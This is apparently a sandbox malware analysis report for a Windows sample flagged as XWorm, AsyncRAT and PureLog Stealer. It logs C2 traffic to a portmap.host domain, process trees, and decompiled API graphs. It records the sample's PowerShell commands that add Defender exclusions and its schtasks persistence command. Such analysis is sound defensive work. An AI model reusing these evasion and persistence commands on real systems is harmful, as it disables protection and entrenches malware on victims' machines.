                  Jul 18, 2024 08:38:30.632381916 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:31.085473061 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:31.087097883 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:31.092075109 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:31.228738070 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:31.230133057 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:31.235171080 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:31.235258102 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:31.240147114 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:31.240386963 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:31.245364904 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:34.209283113 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:34.251597881 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:39.316512108 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:39.326586962 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:39.516701937 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:39.521435022 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:39.527266026 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:40.830056906 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:40.834906101 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:40.892556906 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:40.897356033 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:41.153630018 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:41.155335903 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:41.162439108 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:41.302876949 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:41.309535980 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:41.316514969 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:48.017548084 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:48.022336960 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:48.213232040 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:48.217871904 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:48.222800970 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:51.423670053 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:51.428584099 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:51.665360928 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:51.667167902 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:51.672032118 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:53.581692934 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:53.586553097 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:53.779124022 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:53.783564091 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:53.788629055 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:56.564595938 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:56.570203066 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:56.642652035 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:56.647541046 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:56.689423084 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:56.694299936 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:56.705122948 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:56.709952116 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:56.720597982 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:56.725492001 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:56.849915028 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:56.851316929 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:56.856256962 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:56.995758057 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:56.996978998 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:57.001775026 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:38:57.001838923 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:38:57.007642984 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:00.736450911 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:39:00.741368055 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:01.017435074 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:39:01.021568060 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:01.022490978 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:01.022917032 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:39:01.027704000 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:01.233519077 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:01.235683918 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:39:01.241206884 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:01.801578045 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:39:01.806668043 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:02.012938023 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:02.019078016 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:39:02.024161100 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:03.973865986 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:04.017641068 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:39:12.642725945 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:39:12.648123026 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:13.060374022 CEST3060849708193.161.193.99192.168.2.10
                  Jul 18, 2024 08:39:13.061283112 CEST4970830608192.168.2.10193.161.193.99
                  Jul 18, 2024 08:39:13.066960096 CEST3060849708193.161.193.99192.168.2.10
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 18, 2024 08:35:15.852411985 CEST5852853192.168.2.101.1.1.1
                  Jul 18, 2024 08:35:15.873003006 CEST53585281.1.1.1192.168.2.10
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 18, 2024 08:35:15.852411985 CEST192.168.2.101.1.1.10xe43aStandard query (0)moneymaker-30608.portmap.hostA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 18, 2024 08:35:15.873003006 CEST1.1.1.1192.168.2.100xe43aNo error (0)moneymaker-30608.portmap.host193.161.193.99A (IP address)IN (0x0001)false

                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:1
                  Start time:02:35:05
                  Start date:18/07/2024
                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
                  Imagebase:0xbb0000
                  File size:479'744 bytes
                  MD5 hash:7FDA9F799B84A7ED802F7127869D5E81
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:8
                  Start time:02:35:08
                  Start date:18/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
                  Imagebase:0xa0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:02:35:08
                  Start date:18/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff620390000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:02:35:08
                  Start date:18/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"
                  Imagebase:0xa0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:02:35:08
                  Start date:18/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff620390000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:02:35:08
                  Start date:18/07/2024
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"
                  Imagebase:0x910000
                  File size:187'904 bytes
                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:13
                  Start time:02:35:08
                  Start date:18/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff620390000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:14
                  Start time:02:35:09
                  Start date:18/07/2024
                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
                  Imagebase:0x450000
                  File size:479'744 bytes
                  MD5 hash:7FDA9F799B84A7ED802F7127869D5E81
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Target ID:15
                  Start time:02:35:10
                  Start date:18/07/2024
                  Path:C:\Users\user\AppData\Roaming\pNYyTm.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\pNYyTm.exe
                  Imagebase:0xfd0000
                  File size:479'744 bytes
                  MD5 hash:7FDA9F799B84A7ED802F7127869D5E81
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.1368873082.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 34%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  Target ID:16
                  Start time:02:35:11
                  Start date:18/07/2024
                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Imagebase:0x7ff6616b0000
                  File size:496'640 bytes
                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:17
                  Start time:02:35:14
                  Start date:18/07/2024
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp"
                  Imagebase:0x910000
                  File size:187'904 bytes
                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:18
                  Start time:02:35:15
                  Start date:18/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff620390000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:19
                  Start time:02:35:15
                  Start date:18/07/2024
                  Path:C:\Users\user\AppData\Roaming\pNYyTm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Roaming\pNYyTm.exe"
                  Imagebase:0x9a0000
                  File size:479'744 bytes
                  MD5 hash:7FDA9F799B84A7ED802F7127869D5E81
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low
                  Has exited:true

                  Target ID:23
                  Start time:02:36:06
                  Start date:18/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff620390000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:7.6%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:52
                    Total number of Limit Nodes:7
                    execution_graph 19294 144d300 19295 144d346 19294->19295 19299 144d4e0 19295->19299 19302 144d4cf 19295->19302 19296 144d433 19306 144af54 19299->19306 19303 144d4e0 19302->19303 19304 144af54 DuplicateHandle 19303->19304 19305 144d50e 19304->19305 19305->19296 19307 144d548 DuplicateHandle 19306->19307 19308 144d50e 19307->19308 19308->19296 19330 144af70 19334 144b068 19330->19334 19342 144b05a 19330->19342 19331 144af7f 19335 144b079 19334->19335 19336 144b09c 19334->19336 19335->19336 19350 144b300 19335->19350 19354 144b2f0 19335->19354 19336->19331 19337 144b094 19337->19336 19338 144b2a0 GetModuleHandleW 19337->19338 19339 144b2cd 19338->19339 19339->19331 19343 144b079 19342->19343 19344 144b09c 19342->19344 19343->19344 19348 144b300 LoadLibraryExW 19343->19348 19349 144b2f0 LoadLibraryExW 19343->19349 19344->19331 19345 144b094 19345->19344 19346 144b2a0 GetModuleHandleW 19345->19346 19347 144b2cd 19346->19347 19347->19331 19348->19345 19349->19345 19351 144b314 19350->19351 19353 144b339 19351->19353 19358 144ad88 19351->19358 19353->19337 19355 144b314 19354->19355 19356 144ad88 LoadLibraryExW 19355->19356 19357 144b339 19355->19357 19356->19357 19357->19337 19359 144b4e0 LoadLibraryExW 19358->19359 19361 144b559 19359->19361 19361->19353 19309 1444668 19310 144467a 19309->19310 19311 1444686 19310->19311 19313 1444779 19310->19313 19314 144479d 19313->19314 19318 1444888 19314->19318 19322 1444879 19314->19322 19320 14448af 19318->19320 19319 144498c 19319->19319 19320->19319 19326 14444c4 19320->19326 19324 1444888 19322->19324 19323 144498c 19324->19323 19325 14444c4 CreateActCtxA 19324->19325 19325->19323 19327 1445918 CreateActCtxA 19326->19327 19329 14459db 19327->19329

                    Control-flow Graph

                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0144B2BE
                    Memory Dump Source
                    • Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 2635aa51d5a1775a49800a65abb60139788e8da55586c3a9f195db277989f729
                    • Instruction ID: acada99ceb5392e0cb699f1e2ab4c1f71294e9a2f6dacb43d218c5c75d457b88
                    • Opcode Fuzzy Hash: 2635aa51d5a1775a49800a65abb60139788e8da55586c3a9f195db277989f729
                    • Instruction Fuzzy Hash: 117134B0A00B058FE724DF6AD44475ABBF1FF48244F108A2ED59AD7B60D774E846CB90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 57 144590c-1445913 58 1445918-14459d9 CreateActCtxA 57->58 60 14459e2-1445a3c 58->60 61 14459db-14459e1 58->61 68 1445a3e-1445a41 60->68 69 1445a4b-1445a4f 60->69 61->60 68->69 70 1445a60 69->70 71 1445a51-1445a5d 69->71 73 1445a61 70->73 71->70 73->73
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 014459C9
                    Memory Dump Source
                    • Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 3607a031eaebb27ef1cf8f0ba748728ee6225b326b0b437607c3da0ee91c88f2
                    • Instruction ID: 1447961041ad827e96bbcd1db28e6cea1509bc576cb45c12347328ef397b2495
                    • Opcode Fuzzy Hash: 3607a031eaebb27ef1cf8f0ba748728ee6225b326b0b437607c3da0ee91c88f2
                    • Instruction Fuzzy Hash: E641C4B1C00719CFEB24DFA9C884BDEBBB5BF49304F24815AD409AB251DBB56986CF50

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 74 14444c4-14459d9 CreateActCtxA 77 14459e2-1445a3c 74->77 78 14459db-14459e1 74->78 85 1445a3e-1445a41 77->85 86 1445a4b-1445a4f 77->86 78->77 85->86 87 1445a60 86->87 88 1445a51-1445a5d 86->88 90 1445a61 87->90 88->87 90->90
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 014459C9
                    Memory Dump Source
                    • Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 0d760da579466df98b5f92d8d95f4d00691b3d2f8d2382d28cb24bdc5658e7e5
                    • Instruction ID: 596f849f3d7c2dd522cde89bb327b302e0c7a75c1f1910cf640b9fff490fa363
                    • Opcode Fuzzy Hash: 0d760da579466df98b5f92d8d95f4d00691b3d2f8d2382d28cb24bdc5658e7e5
                    • Instruction Fuzzy Hash: AB41D470C00719CFEB24DFA9C884BDEBBB5BF49304F20815AD408AB251DBB16945CF90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 91 144af54-144d5dc DuplicateHandle 93 144d5e5-144d602 91->93 94 144d5de-144d5e4 91->94 94->93
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0144D50E,?,?,?,?,?), ref: 0144D5CF
                    Memory Dump Source
                    • Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: db8d8bf20acfecbd8b4283ff2c96266e00eec5824aabf164cfd55e37b76986e8
                    • Instruction ID: 90f075f7aeb97950ababb1bfcd53619c7afa623c4b974db430d63fed1d1f622c
                    • Opcode Fuzzy Hash: db8d8bf20acfecbd8b4283ff2c96266e00eec5824aabf164cfd55e37b76986e8
                    • Instruction Fuzzy Hash: B621E3B5D00359AFDB10CF9AD984BEEBBF4EB48314F14841AE914A7310D374A945CFA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 97 144d540-144d543 98 144d548-144d5dc DuplicateHandle 97->98 99 144d5e5-144d602 98->99 100 144d5de-144d5e4 98->100 100->99
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0144D50E,?,?,?,?,?), ref: 0144D5CF
                    Memory Dump Source
                    • Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: be3ea21a49e3f1077da4a64a8804a17cd741580a4afeeb5bdf27c1f568146aa9
                    • Instruction ID: def96d9a0891a0c2e7d35504c9c2105fa11d04d2a7a2ca4bee7119e9a29fb8ac
                    • Opcode Fuzzy Hash: be3ea21a49e3f1077da4a64a8804a17cd741580a4afeeb5bdf27c1f568146aa9
                    • Instruction Fuzzy Hash: 0E21E5B5D003599FDB10CF9AD984BDEBBF4EB48314F24841AE914A7310D374A945CFA4

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 103 144ad88-144b520 105 144b522-144b525 103->105 106 144b528-144b557 LoadLibraryExW 103->106 105->106 107 144b560-144b57d 106->107 108 144b559-144b55f 106->108 108->107
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0144B339,00000800,00000000,00000000), ref: 0144B54A
                    Memory Dump Source
                    • Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: e70a6f2ce733adb1007b1ccb23658d366e3b05a571f6209b675c2ea39e485920
                    • Instruction ID: 7fbb42a83ca0704ddb92294a9b48c5193bd0d702469938e5a7e0be45eeff9bc8
                    • Opcode Fuzzy Hash: e70a6f2ce733adb1007b1ccb23658d366e3b05a571f6209b675c2ea39e485920
                    • Instruction Fuzzy Hash: 481114B69003098FEB24CF9AD444BDEFBF4EB88314F14842AD919A7310C375A945CFA4

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 111 144b4da-144b520 113 144b522-144b525 111->113 114 144b528-144b557 LoadLibraryExW 111->114 113->114 115 144b560-144b57d 114->115 116 144b559-144b55f 114->116 116->115
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0144B339,00000800,00000000,00000000), ref: 0144B54A
                    Memory Dump Source
                    • Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 8c7d260755356e0e01ee42fad6e8d0ce61002c7117f701d8ac9a59fc390da780
                    • Instruction ID: 8abd78a53dc44642ebeb5b586ef99174f55800d324b9747e047e7d0630ee99b6
                    • Opcode Fuzzy Hash: 8c7d260755356e0e01ee42fad6e8d0ce61002c7117f701d8ac9a59fc390da780
                    • Instruction Fuzzy Hash: 0C11E2B69003499FDB14CF9AD844BDEFBF4EB88314F14842AD919A7210C379A545CFA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 119 144b258-144b298 120 144b2a0-144b2cb GetModuleHandleW 119->120 121 144b29a-144b29d 119->121 122 144b2d4-144b2e8 120->122 123 144b2cd-144b2d3 120->123 121->120 123->122
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0144B2BE
                    Memory Dump Source
                    • Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: cf4f7f2cc7ba193dc933954759f83938589b9ce40dba2dfdcd56a4fa395f1737
                    • Instruction ID: 48e3d10c713a6d34da6f103a6d5d360c0c50806e410905424e62ade1cc68b84c
                    • Opcode Fuzzy Hash: cf4f7f2cc7ba193dc933954759f83938589b9ce40dba2dfdcd56a4fa395f1737
                    • Instruction Fuzzy Hash: 7511DFB6C006498FDB24CF9AD444BDEFBF4EB88314F14842AD929A7610C375A545CFA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 125 596f3c8-596f3ed 126 596f3f4-596f4a6 call 596f770 125->126 127 596f3ef 125->127 131 596f4ac-596f630 126->131 127->126 135 596f632-596f633 call 596e448 131->135 136 596f61e-596f624 131->136 143 596f406-596f40c 135->143 144 596f5bd-596f5c5 135->144 145 596f415-596f416 143->145 146 596f40e 143->146 144->143 145->136 146->136 146->145 147 596f629-596f62a 146->147 148 596f509-596f60a 146->148 151 596f5da-596f627 147->151 152 596f66b-596f677 147->152 159 596f638-596f63c 151->159 155 596f67e-596f688 152->155 156 596f679 152->156 156->155 160 596f424-596f430 159->160 161 596f642 159->161 162 596f437-596f448 160->162 163 596f432 160->163 161->152 162->159 163->162
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: r
                    • API String ID: 0-1812594589
                    • Opcode ID: 1406748873067cbd84d8d34413278d3ccf659ce69a87ff5c5eeaa5b36491bd89
                    • Instruction ID: b28c029fb0bcf2084166fcd1e961955d1b64465b69ea7f6d0c5c48f8d34425cd
